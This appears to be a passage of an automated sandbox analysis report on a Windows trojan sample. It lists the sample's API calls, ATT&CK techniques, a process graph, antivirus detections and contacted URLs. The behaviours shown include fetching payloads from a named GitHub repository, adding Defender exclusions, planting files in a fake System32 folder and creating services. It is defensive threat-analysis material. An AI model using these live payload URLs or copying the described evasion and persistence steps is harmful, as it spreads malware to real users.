Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B6F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FF646E5B6F4
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3772860 GetUserNameA,GetLastError,_strdup,53_2_00007FFDA3772860
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55B6B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,53_2_00007FFDA55B6B40
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BD5B2 calloc,calloc,calloc,bind,WSAGetLastError,53_2_00007FFDA55BD5B2
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA558C620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,53_2_00007FFDA558C620
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BD7E0 calloc,calloc,calloc,bind,WSAGetLastError,53_2_00007FFDA55BD7E0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55BD5B2 bind,WSAGetLastError,59_2_00007FFDA55BD5B2
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA558C620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,59_2_00007FFDA558C620
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55BD7E0 bind,WSAGetLastError,59_2_00007FFDA55BD7E0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55778B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,59_2_00007FFDA55778B0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B6B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,59_2_00007FFDA55B6B40
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55B6B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,59_2_00007FFDA55B6B0D

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping11
System Time Discovery		1
Exploitation of Remote Services		12
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter		1
Valid Accounts		1
Valid Accounts		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop ProtocolData from Removable Media21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		111
Windows Service		1
Access Token Manipulation		2
Obfuscated Files or Information		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Service Execution		1
Scheduled Task/Job		111
Windows Service		1
DLL Side-Loading		NTDS32
System Information Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		11
File Deletion		LSA Secrets221
Security Software Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Scheduled Task/Job		121
Masquerading		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Valid Accounts		DCSync121
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
Virtualization/Sandbox Evasion		Network Sniffing1
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1496433 Sample: Ld0f3NDosJ.exe Startdate: 21/08/2024 Architecture: WINDOWS Score: 100 142 tse1.mm.bing.net 2->142 144 runvrs.com 2->144 146 4 other IPs or domains 2->146 156 Multi AV Scanner detection for dropped file 2->156 158 Multi AV Scanner detection for submitted file 2->158 160 Sigma detected: TrustedPath UAC Bypass Pattern 2->160 162 8 other signatures 2->162 12 Ld0f3NDosJ.exe 14 2->12         started        17 svchost.exe 2->17         started        19 console_zero.exe 2->19         started        21 svchost.exe 2->21         started        signatures3 process4 dnsIp5 148 raw.githubusercontent.com 185.199.108.133, 443, 63778, 63790 FASTLYUS Netherlands 12->148 138 C:\Users\user\Desktop\pyld64.exe, PE32+ 12->138 dropped 140 C:\Users\user\AppData\...\hardsvcupdt[1].exe, PE32+ 12->140 dropped 196 Self deletion via cmd or bat file 12->196 198 Found API chain indicative of debugger detection 12->198 200 Adds a directory exclusion to Windows Defender 12->200 23 cmd.exe 1 12->23         started        25 cmd.exe 1 12->25         started        28 cmd.exe 1 12->28         started        150 ipinfo.io 34.117.59.81, 443, 63784 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->150 152 github.com 140.82.121.3, 443, 63796 GITHUBUS United States 17->152 154 2 other IPs or domains 17->154 30 cmd.exe 17->30         started        32 cmd.exe 17->32         started        34 cmd.exe 17->34         started        40 9 other processes 17->40 36 cmd.exe 19->36         started        38 cmd.exe 19->38         started        file6 signatures7 process8 signatures9 42 2 other processes 23->42 174 Uses schtasks.exe or at.exe to add and modify task schedules 25->174 176 Adds a directory exclusion to Windows Defender 25->176 46 2 other processes 25->46 48 2 other processes 28->48 50 2 other processes 30->50 52 2 other processes 32->52 54 2 other processes 34->54 56 2 other processes 36->56 58 2 other processes 38->58 178 Drops executables to the windows directory (C:\Windows) and starts them 40->178 60 18 other processes 40->60 process10 file11 136 C:\Windows\System32\usvcinsta64.exe, PE32+ 42->136 dropped 184 Multi AV Scanner detection for dropped file 42->184 186 Machine Learning detection for dropped file 42->186 62 cmd.exe 1 42->62         started        65 cmd.exe 42->65         started        67 cmd.exe 1 42->67         started        69 4 other processes 42->69 188 Adds a directory exclusion to Windows Defender 46->188 190 Loading BitLocker PowerShell Module 54->190 signatures12 process13 signatures14 202 Drops executables to the windows directory (C:\Windows) and starts them 62->202 71 usvcinsta64.exe 2 62->71         started        75 conhost.exe 62->75         started        77 console_zero.exe 65->77         started        79 conhost.exe 65->79         started        204 Adds a directory exclusion to Windows Defender 67->204 81 powershell.exe 22 67->81         started        83 conhost.exe 67->83         started        85 powershell.exe 69->85         started        87 reg.exe 69->87         started        89 8 other processes 69->89 process15 file16 124 C:\Windows \System32\printui.dll, PE32+ 71->124 dropped 126 C:\Windows \System32\printui.exe, PE32+ 71->126 dropped 164 Multi AV Scanner detection for dropped file 71->164 166 Adds a directory exclusion to Windows Defender 71->166 91 cmd.exe 71->91         started        94 cmd.exe 1 71->94         started        96 cmd.exe 71->96         started        102 2 other processes 71->102 168 Found API chain indicative of debugger detection 77->168 98 cmd.exe 77->98         started        100 cmd.exe 77->100         started        170 Loading BitLocker PowerShell Module 81->170 172 Creates a Windows Service pointing to an executable in C:\Windows 87->172 signatures17 process18 signatures19 192 Drops executables to the windows directory (C:\Windows) and starts them 91->192 104 printui.exe 91->104         started        108 conhost.exe 91->108         started        194 Adds a directory exclusion to Windows Defender 94->194 110 powershell.exe 21 94->110         started        112 conhost.exe 94->112         started        114 powershell.exe 96->114         started        116 conhost.exe 96->116         started        118 2 other processes 98->118 120 2 other processes 100->120 122 3 other processes 102->122 process20 file21 128 C:\Windows\System32\zlib1.dll, PE32+ 104->128 dropped 130 C:\Windows\System32\x543664.dat, PE32+ 104->130 dropped 132 C:\Windows\System32\ucrtbased.dll, PE32+ 104->132 dropped 134 9 other files (7 malicious) 104->134 dropped 180 Adds a directory exclusion to Windows Defender 104->180 182 Loading BitLocker PowerShell Module 110->182 signatures22

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Ld0f3NDosJ.exe53%ReversingLabsWin32.Trojan.Generic
Ld0f3NDosJ.exe54%VirustotalBrowse
Ld0f3NDosJ.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\pyld64.exe100%Joe Sandbox ML
C:\Windows\System32\x543664.dat100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe18%ReversingLabsWin64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe65%VirustotalBrowse
C:\Users\user\Desktop\pyld64.exe18%ReversingLabsWin64.Trojan.Generic
C:\Users\user\Desktop\pyld64.exe65%VirustotalBrowse
C:\Windows \System32\printui.dll62%ReversingLabsWin64.Trojan.Generic
C:\Windows \System32\printui.exe0%ReversingLabs
C:\Windows\System32\console_zero.exe18%ReversingLabsWin64.Trojan.CrypterX
C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
C:\Windows\System32\libcurl.dll0%ReversingLabs
C:\Windows\System32\libiconv-2.dll0%ReversingLabs
C:\Windows\System32\libintl-9.dll0%ReversingLabs
C:\Windows\System32\libpq.dll0%ReversingLabs
C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
C:\Windows\System32\ucrtbased.dll0%ReversingLabs
C:\Windows\System32\usvcinsta64.exe58%ReversingLabsWin64.Trojan.Nekark
C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
C:\Windows\System32\x543664.dat42%ReversingLabsWin64.Trojan.Generic
C:\Windows\System32\zlib1.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
ipinfo.io0%VirustotalBrowse
github.com0%VirustotalBrowse
raw.githubusercontent.com0%VirustotalBrowse
tse1.mm.bing.net0%VirustotalBrowse
ax-0001.ax-msedge.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exes0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeLMEM0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exent.com10%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat0%Avira URL Cloudsafe
https://raw.githubusercontent.com/1F70%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpuwsys.dat0%Avira URL Cloudsafe
http://www.zlib.net/D0%URL Reputationsafe
https://www.openssl.org/H0%URL Reputationsafe
https://curl.se/docs/http-cookies.html0%VirustotalBrowse
https://www.gnu.org/licenses/0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat1%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpuwsys.dat1%VirustotalBrowse
https://curl.se/docs/alt-svc.html0%VirustotalBrowse
https://www.gnu.org/licenses/0%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeNH0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
https://www.openssl.org/0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeQg0%Avira URL Cloudsafe
https://raw.githubusercontent.com/0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html#0%Avira URL Cloudsafe
https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
https://curl.se/0%Avira URL Cloudsafe
https://www.openssl.org/0%VirustotalBrowse
https://raw.githubusercontent.com/1%VirustotalBrowse
https://raw.githubusercontent.com/bG0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%VirustotalBrowse
http://www.zlib.net/0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeU0%Avira URL Cloudsafe
http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
https://curl.se/docs/copyright.htmlD0%VirustotalBrowse
https://curl.se/0%VirustotalBrowse
https://raw.githubusercontent.com/bG0%VirustotalBrowse
https://curl.se/docs/copyright.html0%Avira URL Cloudsafe
http://worldtimeapi.org/api/timezone/Etc/UTC0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html#0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe.net1&00%Avira URL Cloudsafe
https://curl.se/docs/hsts.html#0%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe060%Avira URL Cloudsafe
https://ipinfo.io/json0%Avira URL Cloudsafe
http://mingw-w64.sourceforge.net/X0%VirustotalBrowse
https://curl.se/docs/copyright.html0%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/amdg.dat0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe0%Avira URL Cloudsafe
http://www.zlib.net/0%VirustotalBrowse
http://worldtimeapi.org/api/timezone/Etc/UTC0%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeC:0%Avira URL Cloudsafe
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html#0%Avira URL Cloudsafe
https://github.com/panchitopistolesx/items/raw/main/my_backup_a0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe1%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/nvg.dat0%Avira URL Cloudsafe
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;0%VirustotalBrowse
http://www.gnu.org/licenses/0%Avira URL Cloudsafe
https://ipinfo.io/json0%VirustotalBrowse
https://curl.se/V0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/nvg.dat1%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpu.dat0%Avira URL Cloudsafe
https://raw.githubusercontent.com/panchitopistolesx/items/main/amdg.dat1%VirustotalBrowse
http://www.gnu.org/licenses/0%VirustotalBrowse
https://curl.se/V0%VirustotalBrowse
https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpu.dat1%VirustotalBrowse
https://curl.se/docs/alt-svc.html#0%VirustotalBrowse
https://curl.se/docs/http-cookies.html#0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
runvrs.com
38.180.213.183
truefalse
    		unknown
    ipinfo.io
    		34.117.59.81
    		truefalseunknown
    github.com
    		140.82.121.3
    		truefalseunknown
    raw.githubusercontent.com
    		185.199.108.133
    		truefalseunknown
    ax-0001.ax-msedge.net
    		150.171.27.10
    		truefalseunknown
    tse1.mm.bing.net
    		unknown
    		unknownfalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exefalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exesLd0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3C6000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3C4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/http-cookies.htmlpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exent.com1Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeLMEMLd0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.datsvchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3360844690.000001BB8BA48000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpuwsys.datsvchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/1F7Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.gnu.org/licenses/pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359858423.00000000660F4000.00000008.00000001.01000000.00000013.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeNHLd0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/alt-svc.htmlpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://www.openssl.org/svchost.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeQgLd0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/hsts.htmlpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/alt-svc.html#console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/docs/copyright.htmlDpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://curl.se/svchost.exe, console_zero.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/bGLd0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.zlib.net/svchost.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeULd0f3NDosJ.exe, 00000003.00000002.2356237105.000001E8BF34C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
